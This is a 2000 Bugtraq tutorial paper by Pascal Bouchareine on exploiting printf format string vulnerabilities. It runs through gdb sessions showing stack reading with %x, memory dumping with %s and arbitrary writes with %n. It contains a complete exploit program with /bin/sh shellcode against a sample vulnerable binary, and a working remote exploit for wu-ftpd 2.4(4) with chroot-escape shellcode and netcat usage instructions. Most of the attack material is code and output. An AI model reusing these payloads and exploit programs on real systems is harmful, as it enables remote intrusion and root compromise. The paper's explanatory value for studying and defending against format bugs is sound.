Format string vulnerability

Kalou/Pascal Bouchareine pb@hert.org

First published in Bugtraq, Tue, 18 Jul 2000

Abstract

This paper tries to explain how to exploit a printf(userinput) format bug, reported in some recent advisories. The approach is primary, and more precisely does not take into account any existing exploit (wu-ftpd, ...). A general knowledge of C programming and assembler is assumed throughout this article (stack issues, registers, endian storage).

Playground

Let's begin with an experiment. Have a look at the following code:
void main()
{
  char tmp[512];
  char buf[512];

  while(1)
  {
    memset(buf, '\0', 512);
    read(0, buf, 512);
    sprintf(tmp, buf);
    printf("%s", tmp);
  }
}

It allocates a stack for tmp and buf (buf having the lower address on the stack), reads user input into buf, calls sprintf to fill tmp and prints out tmp.

Let's try it:
[pb@camel][formats]> ./t
foo-bar
foo-bar
%x %x %x %x
25207825 78252078 a782520 0

Clumsy coders are used to see this kind of things, but let's see exactly what happens.

When sprintf encounters a conversion string, it simply takes the first pushed word (32 bits, 4 bytes on intel) on the stack and in the case of "%x" converter, prints it to screen as hexadecimal.

If arguments are explicitly given, it works well, but if they are missing and supposing sprintf's stack is empty, the function hits the caller's stack directly, provided that the stack is growing downward (intel architecture in the example).

For more details, let's look at this second example:
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(gdb) break sprintf
Breakpoint 1 at 0x80481f3
(gdb) run

Starting program: /usr/home/pb/code/format/./t
%x

Breakpoint 1, 0x80481f3 in _IO_sprintf ()
(gdb) x/20x $esp
0xbffff670:     0xbffffa80      0x080481af      0xbffff880      0xbffff680
0xbffff680:     0x000a7825      0x00000000      0x00000000      0x00000000
0xbffff690:     0x00000000      0x00000000      0x00000000      0x00000000
Then there are two arguments for sprintf: Look at what's just after this at address 0xbffff680. Yep, this is the beginning of main's stack frame, with the 0x400 alloc'ed bytes for tmp[] and buf[] where there is what have been entered as input:
  0x000a7825 (little endian : %x\n).
Let's look at the first example again:
[pb@camel][formats]> ./t
%x %x %x %x
25207825 78252078 a782520 0
The %x converter makes sprintf hit a part of the stack where you have :
  "\x25\x78\x20\x25....\x78\x0a\x00\x00\x00\x00"
This is buf[]'s content, with the 0 terminating byte [a word in this case]. Let's study it more in detail, adding a function named do_it, with a 4 bytes stack of 0x04030201, and let's see what happens when sprintf(dst, "%x") is called from it:

void do_it(char *d, char *s)
{
  char buf[] = "\x01\x02\x03\x04";
  sprintf(d, s);
}

main()
{
  char tmp[512];
  char buf[512];

  while(1)
  {
    memset(buf, '\0', 512);
    read(0, buf, 512);
    do_it(tmp, buf);
    printf("%s", tmp);
  }
}
Of course, sprintf is expected to hit do_it()'s buf[] word, using %#010x as format converter:
[pb@camel][formats]> ./t
%#010x
0x04030201
So one has access to do_it()'s stack contents, and can guess main()'s stack frame address, and do_it's return address with ease:
[pb@camel][formats]> ./t
%#010x %x %x %x
0x04030201 bffffa00 bffffac0 80485af
Oh, let's suppose this second pointer (0xbffffa00) is alloc'ed to push sprintf's argument, but 0xbffffac0 and 0x080485af are really the saved ebp, return address:
(gdb) bt
#0  0x8048526 in do_it ()
#1  0x80485af in main ()
(gdb) x/2x $ebp
0xbffff6b0:     0xbffffac0      0x080485af
So easily, one has access to the calling function's stack frame address.

In this example, you can easily remotely guess the location of a return address (main's, for example) to overwrite AND the address of the eggshell (if any): this is done by adding 0x04 to the caller's saved $ebp (the second element of this ($ebp, ret) pair is at 0xbffffac0 + 0x04 == 0xbffffac4):

(gdb) x 0xbffffac4
0xbffffac4:     0x080484be
(gdb) bt
#0  0x8048526 in do_it ()
#1  0x80485af in main ()
#2  0x80484be in ___crt_dummy__ ()

So main's return address (#2) is in ___crt_dummy__i for the time being, but can be changed to anything you want if you can overwrite contents of 0xbffffac4...

And for eggshell address, there are many ways to guess. The simplest way is to find buf[]'s address, which is [bottom of main's stack] - 0x200 + some stack allocated informations :

(gdb) break memset
Breakpoint 1 at 0x8048408
(gdb) c
Continuing.
%#010x %x %x %x
0x04030201 bffffa00 bffffa20 80485af

Breakpoint 1, 0x40078428 in memset ()
(gdb) printf "%s\n", 0xbffffa00 - 0x200 + 0x20
%#010x %x %x %x

Although this quite depends on the program you are running, you can see that methods to find a stack writable return address and a stack executable eggshell are quite easy.

However, the best way to guess stack architecture remotely, when one has no access to the running process, is to "eat" the stack with many "%x" or "%...s" format converters until a [stack address, code segment address] pair is found and the user input string itself is dumped.

Eating stack space with "junk" format converters until the beginning of input string is found is a really nice way to control what happens next: you now have controllable arguments to "%*" format converters, and this really, really comes in handy. Have a look at this (using the first example) :

[pb@camel][formats]> ./t
AAAA%x
AAAA41414141

Remember, the stack is empty. The %x converter makes sprintf take the beginning of the input buffer as an arg-list for the format strings.

One has *many* ways to play around with this.

This "let me control the stack" feature is your friend just as gdb is. You can dump the whole stack, guess stack addresses, and even write to it (as will be explained later using %n converter).

Let's look at this example :
static char find_me[] = "..Buffer was lost in memory\n";

main()
{
  char buf[512];
  char tmp[512];

  while(1) 
  {
    memset(buf, '\0', 512);
    read(0, buf, 512);
    sprintf(tmp ,buf);
    sprintf(tmp ,buf);
    printf("%s", tmp);
  }
}

The goal is to print the string find_me[]. In this simple example, you don't have to search (by %x dummy converters) how many bytes of stack you need to "eat" before you hit the input buffer: this is the very first one. (the example with "AAAA%x" showed it quite clearly). So you basically just have to issue the following "pseudo string" to print out the buffer:

[4 bytes address of find_me]%s

Yes! It is *that* simple: in this case, the input buffer is both the format string AND the format string argument.. :)

Let's do it simply :
[pb@camel][formats]> printf "\x02\x96\x04\x08%s\n" | ./v
(garbage)Buffer was lost in memory

The garbage is the beginning of the format string. So, you are able to dump any part of memory you need to. What was true with remote buffer overflows is not anymore: you dont NEED to seek return address anymore. You don't need to guess anything, since you can inspect memory to find it. (Er, this is true with printf() issues, but not when you can't see what the input produced. See setproctitle() for example.)

Then comes the second (and more funny) part.

Writing into memory

All that wouldn't be that funny if we didn't have the "%n" format converter. This one takes an (int *) argument, and writes the number of bytes written *so far* to that location.

Let's try this (with the very-simple-AAAA%x proggy again):
[pb@camel][formats]> printf "\x70\xf7\xff\xbf%%n\n" > file
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(no debugging symbols found)...
(gdb) set args < file
(gdb) break main
Breakpoint 1 at 0x8048529
(gdb) run
Starting program: /usr/home/pb/code/format/./t < file
(no debugging symbols found)...
Breakpoint 1, 0x8048529 in main ()
(gdb) watch *0xbffff770
Hardware watchpoint 2: *3221223280
(gdb) c
Continuing.
Hardware watchpoint 2: *3221223280

Old value = 0
New value = 4
0x400323f3 in vfprintf ()
(gdb) x 0xbffff770
0xbffff770:     0x00000004

This time, 4 bytes encoded into the format string (an address) are written and the "%n" converter made sprintf report this where it was told to (i.e. 0xbffff770).

Let's play with this a little more. This time, the generated-file looks like this:
printf "\x70\xf7\xff\xbf\x71\xf7\xff\xbf%%n%%n" > file
After two watchpoint hits, at 0xbffff770 you have:
(gdb) x 0xbffff770
0xbffff770:     0x00000808

sprintf wrote 8 bytes (two addresses), and "%n" made it report this to 0xbffff770 and 0xbffff771.

Now, suppose you have an eggshell at 0xbffff710, and the guessed return address lies at 0xbffffa80. You can't afford to write 0xbffff710 bytes into the buffer to make sprintf (through the "%n" converter) write this value on the stack. Remember people are usually affraid of buffer overflows and therefore cut their input buffers :)

But you can use a byte-per-byte construction to build the address. Since "%n" makes sprintf write the number of bytes written so far on the stack, you need to substract the number of bytes already written to each following fragment.

Since the int * thing would erase bytes already written, you have to write address from the lower significant byte to the higher significant byte.

Since you need to have written 0xff bytes before you can write the 0xbf byte, and moreover, you can only *increment* the internal number-of-written-bytes counter, you have to use 0x1bf, erasing a meaningless byte on the stack.

Note that you could use the "%hn" converter, and make sprintf write short int arguments to the stack. But this won't be discussed here.

Here is the "address builder" code explain so far:
main()
{
  char b1[255];
  char b2[255];
  char b3[255];

  memset(b1, 0, 255);
  memset(b2, 0, 255);
  memset(b3, 0, 255);
  memset(b1, '\x90', 0xf7 - 0x10);
  memset(b2, '\x90', 0xff - 0xf7);
  memset(b3, '\x90', 0x01bf - 0xff);

  printf("\x80\xfa\xff\xbf" // arguments to the "%n" converter.
         "\x81\xfa\xff\xbf" // ditto
         "\x82\xfa\xff\xbf" // ..
         "\x83\xfa\xff\xbf" // last byte.

         "%%n"   // 1) gives 0x10 ( 16 first bytes )
         "%s%%n" // 2) gives 0xf7: string len is 0xf7 - 0x10
         "%s%%n" // 3) gives 0xff: string len is 0xff - 0xf7
         "%s%%n" // 4) gives 0x01bf: string len is 0x01bf - 0xff
         ,b1, b2, b3);

  // you now have 0xbffff710 at 0xbffffa80
}
Let's try it:
(after 3 hits on watchpoint)
(gdb) c
Continuing.
Hardware watchpoint 3: *3221224064

Old value = 16774928
New value = -1073744112
0x400323f3 in vfprintf ()
(gdb) x/2 0xbffffa80
0xbffffa80:     0xbffff710      0xbf000001

Is seems to work quite well. The work is almost finished now, you just have to push an eggshell after all this format trick, and make the program jump back in it. Let's try to apply everything said before, with the following vulnerable program:

Sample exploitation.
void do_it(char *dst, char *src)
{
  int foo;
  char bar;

  sprintf(dst, src);
}

main()
{
  char buf[512];
  char tmp[512];

  memset(buf, '\0', 512);
  read(0, buf, 512);
  do_it(tmp, buf);
  printf("%s", tmp);
}
First you have to find where's your input buffer, to control the format string.
[pb@camel][formats]> gcc vuln.c -o v
[pb@camel][formats]> ./v
AAAA %x %c %x
AAAA 0 À bffffac0
                      (int foo, char bar, stack)
...

AAAA %x %x %x %x %x %x %x %x %x
AAAA 0 bffffac0 bffffac0 804859f bffff6c0 bffff8c0 41414141 62203020 66666666
                      (the *output* buffer is at offset 28)

Look at the stack frame, which is a (stack addr, code addr) pair: the return address in main is 0x0804859f, main's stack saved ebp and ret addr begins at 0xbffffac0.

You now know that main's return address is at 0xbffffac4 (the second part of the [stack, code] pair is of course at pair + 4).

Then you get some information about main's return address:
printf "AAAA\xc0\xfa\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v \
 | hexdump

0000000 4141 4141 fac0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fad4 bfff 84be 0804 0a01 000a

stack/ret is 0xbffffad4/0x080484be (check this with gdb).

Supposing do_it's frame is something like 0x400 bytes before main's frame, (in fact, it is 0x410 bytes), you can find do_it's stack frame address, since you know that there must be main's saved frame pointer followed by a code segment return address, then by main's stack:

after a lot of tries you have:
printf "AAAA\xb0\xf6\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v \
| hexdump

  0000000 4141 4141 f6b0 bfff 6230 6666 6666 6361
  0000010 6230 6666 6666 6361 3830 3430 3538 3838
  0000020 6662 6666 3666 3063 6662 6666 3866 3063
  0000030 3134 3134 3134 3134 7720 2065 7274 2079
  0000040 fac0 bfff 8588 0804 f6c0 bfff f8c0 bfff
  0000050 4141 4141 f6b0 bfff 6230 6666 6666 6361
  0000060 6230 6666 6666 6361 3830 3430 3538 3838
  0000070 6662 6666 3666 3063 6662 6666 3866 3063
  0000080 3134 3134 3134 3134 7720 2065 7274 2079
  0000090 0a0a

(this prints "..we try [contents of 0xbffff6b0]) Bingo! There you have (we try .. is just before offset 0x40)

0xbffffac0,0x08048588 at 0xbffff6b0.

Remember the (stack, code) pair addresses ? This is in fact do_it's stack frame.

You can see sprintf's args just after: 0xbffff6c0 and 0xbffff8c0. These are addresses of the two buffers. 0x41414141 is the beginning of the input buffer, so you can see that hexdump's offset 0x50 is at address 0xbffff6c0, and since you are good at math, you confirm that hexdump's offset 0x40 is indeed at 0xbffff6b0.

This process lets you remotely guess
  1. stack return address,
  2. buffer address.

You have all the information you need to format the stack, so let's get to the next step: build the eggshell & the appropriate buffer.

The buffer will lie at 0xbffff8c0. BUT, since it is filled with lots of illegal instructions (i.e. the format converters), the "\x90" string must end with a "\xeb\x02" to jump over the "%n" format converters, therefore, you need not worry about the effective egg address.

So all you need to do is to push 4 addresses (one address per byte of the return address to overwrite), a series of "%x" converters to "eat" stack space, then a series of nops followed by a "%n" converter (in order to build the return address) and somewhere the eggshell.

Tough this is not the easiest part, a little brain boost (coffe, cocaine, coca-cola(tm), anything you like) leads to :

void main()
{
  char b1[255];
  char b2[255];
  char b3[255];
  char b4[255];
  char xx[600];
  int  i;

  char egg[] =
     "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
     "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
     "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";


//  ( (void (*)()) egg)();

  memset(b1, 0, 255);
  memset(b2, 0, 255);
  memset(b3, 0, 255);
  memset(b4, 0, 255);
  memset(xx, 0, 513);

  for (i = 0; i < 12 ; i += 2) { /* setup the 6 "%x" to eat stack space */
    strcpy(&xx[i], "%x");
  }

  memset(b1, '\x90', 0xd0 - 16 - 12 - 2 - 28);
                                          // 16 (4 addresses)
                                          // 2  (%n)
                                          // 40 (%x output - "guess it..")
                                          //     use nice formats for
                                          //     fixed output size... :)
                                          //     + 200- (4 bytes)

  memset(b2, '\x90', 0xf8 - 0xd0 - 2);  // first 0x90 string is at
                                        // 0xbffff8d0.. (c0 + 4 * 4 bytes) :)
                                        // -2 because of "\xeb\x02"

  memset(b3, '\x90', 0xff - 0xf8 - 2);  // ditto, with -2.

  memset(b4, '\x90', 0x01bf - 0xff - 2);  // ditto.

  printf("\xb4\xf6\xff\xbf"  //
         "\xb5\xf6\xff\xbf"  // this points to do_it's
         "\xb6\xf6\xff\xbf"  // return address storage word.
         "\xb7\xf6\xff\xbf"  //
         "%s"    // 0) there are 6 "%x", to eat stack until the input buf
                 //    begins to control the format strings.

         "%s\xeb\x02%%n"   // 1) gives 0xd0 (4 * 4 bytes add, %x are ignored )
         "%s\xeb\x02%%n"   // 2) gives 0xf9
         "%s\xeb\x02%%n"   // 3) gives 0xff
         "%s\xeb\x02%%n%s" // 4) gives 0x01bf
         , xx, b1, b2, b3, b4, egg);

}
Let's give it a final try:
[pb@camel][formats]> ( ./b ; cat ) | ./v
id
uid=1001(pb) gid=100(users) groups=100(users)
date
Sat Jul 15 22:15:07 CEST 2000

Conclusion

These format bugs are really nasty. First, if you can read the output of the final buffer (e.g. printf(Userinput)), you obviously have control over the computer processing it. You have some kind of remote-debugger-access to the machine, that allows you to get in at the first try. These are bad news for developpers. (wu-ftpd format bug used by an aware person is a one-try remote root..).

Playing around format args and pointers allows us to construct some kind of "generic format string" that will overwrite *certainly* the caller's return address. This must be coupled with a remote return address guess to work properly, but gives *at least* the same luck rate as remote buffer overruns. Even if you don't see what you do (setproctitle), this is still an easy way to get in.

garbage & greetings

This is what I built against my old wu-ftpd [wu-2.4(4)] using the above technique. It worked, but i had to cut my intput format string to 512 bytes : I included the eggshell in another part of memory, using the PASS command. This address is still easy to guess.

Sample example - part 2: wu-ftpd v2.4(4), exploitation

/*
 * Sample example - part 2: wu-ftpd v2.4(4), exploitation.
 *
 * usage:
 *  1) find the right address location/eggshell location
 *     this is easy with a little play around %s and hexdump.
 *     Then, fix this exploit.
 *
 *  2) (echo "user ftp"; ./exploit; cat) | nc host 21
 *
 *      echo ^[c to clear your screen if needed.
 *
 *  Don't forget 0xff must be escaped with 0xff.
 *
 *
 */

main()
{
  char b1[255];
  char b2[255];
  char b3[255];
  char b4[255];
  char xx[600];
  int  i;

  char egg[]= /* Lam3rZ chroot() code */
   "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
   "\x43\x89\xd9\x41\xb0\x3f\xcd\x80"
   "\xeb\x6b\x5e\x31\xc0\x31"
   "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
   "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
   "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
   "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
   "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
   "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
   "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
   "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";

//  ( (void (*)()) egg)();

  memset(b1, 0, 255);
  memset(b2, 0, 255);
  memset(b3, 0, 255);
  memset(b4, 0, 255);
  memset(xx, 0, 513);

  for (i = 0; i < 20 ; i += 2) { /* setup up the 10 %x to eat stack space */
    strcpy(&xx[i], "%x");
  }

  memset(b1, '\x90', 0xa3 - 0x50);
  memset(b2, '\x90', 0xfe - 0xa3 - 2);
  memset(b3, '\x90', 0xff - 0xfe);
  memset(b4, '\x90', 0x01bf - 0xff);     // build ret address here.
                                         // i found 0xbffffea3

  printf("pass %s@oonanism.com\n", egg);
  printf("site exec .."
         "\x64\xf9\xff\xff\xbf"  // insert ret location there.
         "\x65\xf9\xff\xff\xbf"  // i had 0xbffff964
         "\x66\xf9\xff\xff\xbf"
         "\x67\xf9\xff\xff\xbf"
         "%s"
         "%s\xeb\x02%%n"
         "%s\xeb\x02%%n"
         "%s%%n"
         "%s%%n\n"
         , xx, b1, b2, b3, b4);

}


many thanks to...

("grep yourself or ignore this part")
  The best goes to Ouaou - Ignacy Gawedzki , who drastically
  changed this article and made something understandable with it.
  My english sucks, he's a babelfish..
  Flaoua, my roomy, helped a lot, bearing me, my machines and my monomania.
  Try her cookies someday.
  My girlfriend didn't have sex (did she ?) since i met Linux(c)(r)(tm),
  a couple of days ago...  Apologies.
  Gaius, cleb - I need a beer.
  HERT guys, since they own me.
  ADM, great, productive work, and with humor, doh.
  Michal Zalewski, Solar Designer - they're my heroes.
Enough greetings for such a bad paper, hope you enjoyed it. Pascal Bouchareine